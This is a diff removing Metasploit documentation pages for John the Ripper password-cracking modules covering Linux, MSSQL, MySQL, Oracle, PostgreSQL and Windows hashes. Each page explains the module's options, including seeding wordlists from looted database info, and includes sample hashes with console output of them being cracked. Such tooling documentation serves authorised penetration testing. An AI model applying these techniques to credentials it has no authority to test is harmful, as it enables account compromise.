-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```

documentation/modules/auxiliary/analyze/jtr_mssql_fast.md

@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
-----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```

documentation/modules/auxiliary/analyze/jtr_mysql_fast.md

@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
-----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```

documentation/modules/auxiliary/analyze/jtr_oracle_fast.md

@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
-----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```

documentation/modules/auxiliary/analyze/jtr_postgres_fast.md

@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
-----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```

documentation/modules/auxiliary/analyze/jtr_windows_fast.md

@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
